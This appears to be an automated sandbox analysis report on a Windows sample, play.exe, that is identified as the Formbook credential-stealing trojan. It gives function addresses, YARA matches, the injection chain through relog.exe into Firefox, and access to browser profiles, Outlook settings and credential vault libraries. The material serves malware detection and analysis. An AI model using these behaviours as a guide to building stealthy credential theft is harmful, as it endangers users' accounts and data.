Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03292F28	5_2_03292F28
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03270F30	5_2_03270F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F2F30	5_2_032F2F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C4F40	5_2_032C4F40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032CEFA0	5_2_032CEFA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03242FC8	5_2_03242FC8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EE26	5_2_0330EE26
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250E59	5_2_03250E59
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330CE93	5_2_0330CE93
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03262E90	5_2_03262E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330EEDB	5_2_0330EEDB
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325AD00	5_2_0325AD00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ECD1F	5_2_032ECD1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03268DBF	5_2_03268DBF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0324ADE0	5_2_0324ADE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03250C00	5_2_03250C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F0CB5	5_2_032F0CB5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03240CF2	5_2_03240CF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330132D	5_2_0330132D
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323D34C	5_2_0323D34C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0329739A	5_2_0329739A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032552A0	5_2_032552A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F12ED	5_2_032F12ED
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326D2F0	5_2_0326D2F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B2C0	5_2_0326B2C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328516C	5_2_0328516C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0323F172	5_2_0323F172
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0331B16B	5_2_0331B16B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0325B1B0	5_2_0325B1B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F0E0	5_2_0330F0E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033070E9	5_2_033070E9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FF0CC	5_2_032FF0CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032570C0	5_2_032570C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F7B0	5_2_0330F7B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295630	5_2_03295630
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033016CC	5_2_033016CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307571	5_2_03307571
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032ED5B0	5_2_032ED5B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_033195C3	5_2_033195C3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330F43F	5_2_0330F43F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03241460	5_2_03241460
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FB76	5_2_0330FB76
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FB80	5_2_0326FB80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0328DBF9	5_2_0328DBF9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C5BF0	5_2_032C5BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C3A6C	5_2_032C3A6C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307A46	5_2_03307A46
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FA49	5_2_0330FA49
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032EDAAC	5_2_032EDAAC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03295AA0	5_2_03295AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032F1AA3	5_2_032F1AA3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032FDAC6	5_2_032FDAC6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032E5910	5_2_032E5910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259950	5_2_03259950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326B950	5_2_0326B950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032BD800	5_2_032BD800
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032538E0	5_2_032538E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FF09	5_2_0330FF09
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FFB1	5_2_0330FFB1
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03251F92	5_2_03251F92
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD2	5_2_03213FD2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03213FD5	5_2_03213FD5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03259EB0	5_2_03259EB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03307D73	5_2_03307D73
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03253D40	5_2_03253D40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_03301D5A	5_2_03301D5A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0326FDC0	5_2_0326FDC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_032C9C32	5_2_032C9C32
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0330FCF2	5_2_0330FCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C1DB0	5_2_008C1DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCC7	5_2_008BCCC7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCCD0	5_2_008BCCD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BCEF0	5_2_008BCEF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008BAF70	5_2_008BAF70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C5470	5_2_008C5470
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008C3650	5_2_008C3650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_008DBBC0	5_2_008DBBC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E308	5_2_0310E308
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E7BC	5_2_0310E7BC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D7F4	5_2_0310D7F4
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310E423	5_2_0310E423
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310CAAA	5_2_0310CAAA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 5_2_0310D828	5_2_0310D828
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0532374F	6_2_0532374F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530CFFF	6_2_0530CFFF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530993F	6_2_0530993F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530B1DF	6_2_0530B1DF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304856	6_2_05304856
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_0530485F	6_2_0530485F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05304A7F	6_2_05304A7F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 6_2_05302AFF	6_2_05302AFF
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364AAAA	7_2_000001917364AAAA
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C308	7_2_000001917364C308
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C7BC	7_2_000001917364C7BC
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B828	7_2_000001917364B828
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364C423	7_2_000001917364C423
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 7_2_000001917364B7F4	7_2_000001917364B7F4

Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03297E54 appears 107 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032CF290 appears 103 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 0323B970 appears 262 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 03285130 appears 58 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 032BEA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0268B970 appears 262 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0270EA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026D5130 appears 58 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 0271F290 appears 103 times
Source: C:\Users\user\Desktop\play.exe	Code function: String function: 026E7E54 appears 107 times

Source: play.exe, 00000000.00000002.2062190338.0000000002931000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \VarFileInfo\TranslationProductVersion\StringFileInfo\%04x%04x\%sOriginalFilename vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRelog.exej% vs play.exe
Source: play.exe, 00000000.00000003.1957582944.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.1959294394.00000000025E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe

Source: play.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@17/14

Source: C:\Windows\SysWOW64\relog.exe

File created: C:\Users\user\AppData\Local\Temp\--x702s3

Jump to behavior

Source: play.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\play.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: relog.exe, 00000005.00000002.4103860914.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4103860914.0000000002D22000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: play.exe	ReversingLabs: Detection: 55%
Source: play.exe	Virustotal: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\play.exe "C:\Users\user\Desktop\play.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\play.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\relog.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: play.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE90CB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00BE90CB

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB7150 push esp; retf	0_2_00BB71BF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB9AC0 push esp; ret	0_2_00BB9AC1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6A13 push ds; iretd	0_2_00BB6A20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6BC7 push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6B6E push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BADB4C push edx; iretd	0_2_00BADB4D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6CA3 push ebp; retn A5BAh	0_2_00BB6D89
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA8DDA pushfd ; retf	0_2_00BA8E23
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8505 push ecx; ret	0_2_00BE8518
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3D70 push eax; ret	0_2_00BA3D72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2687 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB3EE3 push FFFFFFD3h; ret	0_2_00BB3FC3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA26D1 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4E7C push ecx; ret	0_2_00BB4E83
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA272B push eax; ret	0_2_00BA2736
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4F7E push ebp; iretd	0_2_00BB4F82
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA276E push eax; ret	0_2_00BA2776
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266225F pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026627FA pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266283D push eax; iretd	0_2_02662858
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD push ecx; mov dword ptr [esp], ecx	0_2_026909B6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266135F push eax; iretd	0_2_02661369
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978BAC push esp; retf	4_2_03978C1B
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977BCD push 0B2B29DEh; ret	4_2_03977BD2
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969B0C push 9D5CB4DDh; retf	4_2_03969B16
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969A00 push esp; retf	4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039699FB push esp; retf	4_2_039699FF
